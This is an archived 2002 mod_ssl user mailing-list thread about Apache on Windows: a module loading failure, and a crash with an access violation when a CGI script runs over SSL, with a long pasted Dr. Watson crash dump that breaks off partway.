+0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA20928; Wed, 13 Feb 2002 19:10:10 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id C95F84CE61C; Wed, 13 Feb 2002 19:10:09 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1DF0ao01463; Wed, 13 Feb 2002 16:00:36 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id LAA26905; Wed, 13 Feb 2002 11:14:04 +0100 (MET) Date: Wed, 13 Feb 2002 11:14:04 +0100 (MET) Message-Id: <200202131014.LAA26905@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] Can't load mod_ssl module (PR#649) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You have to download and install (unzip and add to %PATH%) this tool:openssl-0.9.6c-win32.zip (http://www.modssl.org/contrib/) to solve this problem. >I have somme trouble with the installation of SSL on apache. >I downloaded and installed the files : >apache_1.3.22-win32-x86.exe >Apache_1.3.22-Mod_SSL_2.8.5-OpenSSL_0.9.6b-WIN32.zip >following exactly the instructions on the How-To page given in the second file. >When I start my server, I obtain : >Syntax Error on line 196 of c:/program files/apache/conf/httpd.conf: >Cannot load c:/program files/apache/modules/mod_ssl.so into server: <126> Le >mod >ule sp?cifi? est introuvable: >I checked the file. Definitely, it's here ! on the right directory !!! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 13 19:28:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA22472; Wed, 13 Feb 2002 19:27:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from smtp013.mail.yahoo.com id TAA22443; Wed, 13 Feb 2002 19:26:17 +0100 (MET) Received: from unknown (HELO webtest) (129.63.134.222) by smtp.mail.vip.sc5.yahoo.com with SMTP; 13 Feb 2002 18:26:15 -0000 From: "c2z4s9" To: Subject: Apache Access Violation Date: Wed, 13 Feb 2002 13:28:23 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "c2z4s9" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am running Apache-mod_ssl 1.3.22 on a NT machine. A frame of one of the web pages calls a CGI script. When attepting to run this script the child process I am currently running crashes with an access violation (exception number c0000005). This does NOT seem to happen if either I open the frame as a serpate page Or if I disable SSL. I think that I could simply make the frame a button to open a new page (and then run the script) but I was wondering if it might be something I can fix (less change the better). If it may help the frame calls a CGI script that takes your input and places it in a file. I have also attemted to recreate this problem on a windows98 machine and have been unable to do so. I am sorry if I am not being entirely clear but it is a strange problem. Here is the error.log [Tue Feb 12 16:51:30 2002] [error] Failed to resolve server name for 46.53.45.56 (check DNS) -- or specify an explicit ServerName [Tue Feb 12 16:51:31 2002] [info] Parent: Created child process 176 [Tue Feb 12 16:51:31 2002] [info] Parent: Duplicating socket 144 and sending it to child process 176 [Tue Feb 12 16:51:52 2002] [info] BytesRead = 372 WSAProtocolInfo = 2006620 [Tue Feb 12 16:53:44 2002] [info] master_main: Child processed exited (due to MaxRequestsPerChild?). Restarting the child process. [Tue Feb 12 16:54:04 2002] [error] Failed to resolve server name for 46.53.45.56 (check DNS) -- or specify an explicit ServerName [Tue Feb 12 16:54:04 2002] [info] Parent: Created child process 214 [Tue Feb 12 16:54:04 2002] [info] Parent: Duplicating socket 144 and sending it to child process 214 [Tue Feb 12 16:54:26 2002] [info] BytesRead = 372 WSAProtocolInfo = 2006620 If you are interested I have the NT error info as well (very long and confusing to me). _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 13 19:56:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA23679; Wed, 13 Feb 2002 19:55:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id TAA23672; Wed, 13 Feb 2002 19:54:42 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g1DIt2a06205 for ; Wed, 13 Feb 2002 13:55:02 -0500 Date: Wed, 13 Feb 2002 13:55:02 -0500 (EST) From: Cliff Woolley X-X-Sender: To: Subject: Re: Apache Access Violation In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, 13 Feb 2002, c2z4s9 wrote: > If you are interested I have the NT error info as well (very long and > confusing to me). Yes, that's important information. Please post it if it's not incredibly long, or at least email it to me directly at jwoolley@apache.org. Thanks, --Cliff -------------------------------------------------------------- Cliff Woolley Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 13 22:43:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA02434; Wed, 13 Feb 2002 22:42:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id WAA02414; Wed, 13 Feb 2002 22:41:44 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id F40C74CE749; Wed, 13 Feb 2002 22:41:43 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1DLcuG11132; Wed, 13 Feb 2002 22:38:56 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from smtp010.mail.yahoo.com id UAA25629; Wed, 13 Feb 2002 20:29:50 +0100 (MET) Received: from unknown (HELO webtest) (129.63.134.222) by smtp.mail.vip.sc5.yahoo.com with SMTP; 13 Feb 2002 19:29:47 -0000 From: "c2z4s9" To: Subject: RE: Apache Access Violation Date: Wed, 13 Feb 2002 14:31:45 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 In-Reply-To: Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "c2z4s9" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Here it is.... Application exception occurred: App: (pid=92) When: 1/25/2002 @ 16:33:40.677 Exception number: c0000005 (access violation) *----> System Information <----* Computer Name: USAF-ART4 User Name: SYSTEM Number of Processors: 1 Processor Type: x86 Family 6 Model 6 Stepping 5 Windows Version: 4.0 Current Build: 1381 Service Pack: 6 Current Type: Uniprocessor Free Registered Organization: USAF Registered Owner: Space Forecast *----> Task List <----* 0 Idle.exe 2 System.exe 20 smss.exe 24 csrss.exe 34 winlogon.exe 40 services.exe 43 lsass.exe 70 spoolss.exe 42 nddeagnt.exe 79 Apache.exe 86 Explorer.exe 87 RpcSs.exe 99 tapisrv.exe 107 rasman.exe 119 PROMon.exe 121 loadwc.exe 131 inetinfo.exe 134 pstores.exe 140 MSTask.exe 92 Apache.exe 129 CMD.exe 115 dispatch.exe 237 Guardian.exe 56 Backup4.exe 127 drwtsn32.exe 0 _Total.exe (00400000 - 00400000) (77f60000 - 77fbe000) dll\ntdll.dbg (6ff60000 - 6ff60000) (77f00000 - 77f5e000) dll\kernel32.dbg (77e70000 - 77ec5000) dll\user32.dbg (77ed0000 - 77efc000) dll\gdi32.dbg (77dc0000 - 77dff000) dll\advapi32.dbg (77e10000 - 77e67000) dll\rpcrt4.dbg (776b0000 - 776c4000) dll\ws2_32.dbg (78000000 - 78044000) (776a0000 - 776a7000) dll\ws2help.dbg (1c0f0000 - 1c0f0000) (10000000 - 10000000) (009d0000 - 009d0000) (00a00000 - 00a00000) (776d0000 - 776d8000) dll\wsock32.dbg (74ff0000 - 74ffe000) dll\rnr20.dbg (77bf0000 - 77bf7000) dll\rpcltc1.dbg (75360000 - 75367000) dll\rasadhlp.dbg (77660000 - 7766f000) dll\msafd.dbg (77690000 - 77699000) dll\wshtcpip.dbg (77800000 - 7783a000) dll\netapi32.dbg (77840000 - 77849000) dll\NetRap.dbg (777e0000 - 777ed000) dll\samlib.dbg (54380000 - 54387000) dll\infoctrs.dbg (54300000 - 54308000) dll\infoadmn.dbg (54d80000 - 54d87000) dll\ftpctrs2.dbg (54d00000 - 54d07000) dll\ftpsapi2.dbg (75460000 - 7546f000) dll\perfctrs.dbg (74ba0000 - 74ba9000) dll\snmpapi.dbg (75280000 - 75287000) dll\rasctrs.dbg (751a0000 - 751b2000) dll\rasman.dbg (74a00000 - 74a06000) dll\tapiperf.dbg (76a90000 - 76a9f000) dll\inetmib1.dbg (74a10000 - 74a2f000) dll\tapi32.dbg (77b20000 - 77bd7000) dll\ole32.dbg State Dump for Thread Id 0x7b eax=00000102 ebx=0012fb60 ecx=00001501 edx=00000000 esi=00000000 edi=000001ec eip=77f682db esp=0012facc ebp=0012fb20 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:0114e4d3=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 0012fb20 77664a12 000001ec 00000008 00000001 00000004 ntdll!NtWaitForSingleObject 0012fc48 776b9f5f 00000009 0012fd88 00000000 00000000 msafd! 0012fc98 6ff6bcc5 00000009 0012fd88 00000000 00000000 ws2_32!select *----> Raw Stack Dump <----* 0012facc f3 87 66 77 ec 01 00 00 - 01 00 00 00 f8 fa 12 00 ..fw............ 0012fadc 00 00 00 00 88 fd 12 00 - 60 fb 12 00 20 a8 ac 0a ........`... ... 0012faec be a5 c1 01 ff ff ff ff - ff ff ff 7f c0 b4 b3 ff ................ 0012fafc ff ff ff ff 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 0012fb0c c3 49 66 77 08 00 00 00 - ec 01 00 00 00 00 00 00 .Ifw............ 0012fb1c 00 00 00 00 48 fc 12 00 - 12 4a 66 77 ec 01 00 00 ....H....Jfw.... 0012fb2c 08 00 00 00 01 00 00 00 - 04 00 00 00 b8 2d 14 00 .............-.. 0012fb3c 88 fd 12 00 80 ae 13 00 - 80 69 67 ff ff ff ff ff .........ig..... 0012fb4c 01 00 00 00 00 00 34 00 - 08 00 00 00 19 00 00 00 ......4......... 0012fb5c 00 00 00 00 f5 01 00 00 - 00 00 00 00 00 00 00 00 ................ 0012fb6c 01 00 01 00 00 00 00 00 - 8e 13 00 78 74 02 00 00 ...........xt... 0012fb7c 5c 00 00 00 e1 00 00 00 - 08 80 af 80 00 00 00 00 \............... 0012fb8c 10 00 00 00 f5 8b 92 99 - 91 81 6b f3 a8 a3 14 80 ..........k..... 0012fb9c a8 38 7d 00 8e 13 00 78 - cc fb 12 00 ff ff ff ff .8}....x........ 0012fbac 01 00 00 00 80 69 67 ff - 7c b5 6b 77 00 00 00 00 .....ig.|.kw.... 0012fbbc f6 ff ff ff 01 00 00 00 - 60 12 03 78 ff ff ff ff ........`..x.... 0012fbcc 18 b0 6b 77 19 c5 f6 6f - f0 25 7d 00 ac 13 f0 77 ..kw...o.%}....w 0012fbdc 38 02 00 00 17 c8 f6 6f - 38 02 00 00 4c fb 12 00 8......o8...L... 0012fbec 2c 00 00 00 03 01 00 00 - 54 fb 12 00 00 00 00 00 ,.......T....... 0012fbfc 00 00 00 00 00 00 dd 03 - 10 00 00 00 00 00 00 00 ................ State Dump for Thread Id 0xb7 eax=6ff7fe80 ebx=00000000 ecx=007d2640 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=00ccfef0 ebp=00ccff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:01cee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 00ccff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 00ccff7c 6ff6b34a 00000000 78003820 00000000 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xb8 eax=0000000c ebx=00000000 ecx=00dcdf04 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=00dcfef0 ebp=00dcff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:01dee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 00dcff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 00dcff7c 6ff6b34a 00000001 78003820 00000001 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xb9 eax=0015509c ebx=00000000 ecx=0015507c edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=00ecfef0 ebp=00ecff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:01eee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 00ecff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 00ecff7c 6ff6b34a 00000002 78003820 00000002 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xba eax=78036820 ebx=00000000 ecx=009a0120 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=00fcfef0 ebp=00fcff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:01fee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 00fcff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 00fcff7c 6ff6b34a 00000003 78003820 00000003 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xbb eax=0000000c ebx=00000000 ecx=010cdf04 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=010cfef0 ebp=010cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:020ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 010cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 010cff7c 6ff6b34a 00000004 78003820 00000004 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xbc eax=6ffa3f25 ebx=00000000 ecx=011cfe98 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=011cfef0 ebp=011cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:021ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 011cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 011cff7c 6ff6b34a 00000005 78003820 00000005 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xbd eax=00002000 ebx=00000000 ecx=00000012 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=012cfef0 ebp=012cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:022ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 012cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 012cff7c 6ff6b34a 00000006 78003820 00000006 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xbe eax=00000004 ebx=00000000 ecx=013cbef4 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=013cfef0 ebp=013cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:023ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 013cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 013cff7c 6ff6b34a 00000007 78003820 00000007 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xb0 eax=00001000 ebx=00000000 ecx=03fe0000 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=014cfef0 ebp=014cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:024ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 014cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 014cff7c 6ff6b34a 00000008 78003820 00000008 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xb1 eax=00998760 ebx=00000000 ecx=009a05a0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=015cfef0 ebp=015cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:025ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 015cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 015cff7c 6ff6b34a 00000009 78003820 00000009 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xb2 eax=009a17e8 ebx=00000000 ecx=009a05a0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=016cfef0 ebp=016cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:026ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 016cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 016cff7c 6ff6b34a 0000000a 78003820 0000000a 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xb3 eax=009a17e8 ebx=00000000 ecx=009a05a0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=017cfef0 ebp=017cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:027ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 017cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 017cff7c 6ff6b34a 0000000b 78003820 0000000b 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xb4 eax=00001000 ebx=00000000 ecx=03ff0000 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=018cfef0 ebp=018cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:028ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 018cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 018cff7c 6ff6b34a 0000000c 78003820 0000000c 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xb5 eax=00001000 ebx=00000000 ecx=03fe0000 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=019cfef0 ebp=019cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:029ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 019cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 019cff7c 6ff6b34a 0000000d 78003820 0000000d 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xb6 eax=000001a8 ebx=00000000 ecx=00000004 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=01acfef0 ebp=01acff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:02aee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 01acff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 01acff7c 6ff6b34a 0000000e 78003820 0000000e 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xbf eax=00000000 ebx=00000000 ecx=0000000c edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=01bcfef0 ebp=01bcff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:02bee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 01bcff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 01bcff7c 6ff6b34a 0000000f 78003820 0000000f 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc0 eax=007bd5e0 ebx=00000000 ecx=00998510 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=01ccfef0 ebp=01ccff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:02cee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 01ccff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 01ccff7c 6ff6b34a 00000010 78003820 00000010 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc1 eax=00000005 ebx=00000000 ecx=00996738 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=01dcfef0 ebp=01dcff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:02dee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 01dcff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 01dcff7c 6ff6b34a 00000011 78003820 00000011 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc2 eax=0000080c ebx=00000000 ecx=01eccee0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=01ecfef0 ebp=01ecff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:02eee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 01ecff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 01ecff7c 6ff6b34a 00000012 78003820 00000012 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc3 eax=0000000c ebx=00000000 ecx=01fcdf04 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=01fcfef0 ebp=01fcff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:02fee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 01fcff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 01fcff7c 6ff6b34a 00000013 78003820 00000013 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc4 eax=009c7600 ebx=00000000 ecx=009a05e0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=020cfef0 ebp=020cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 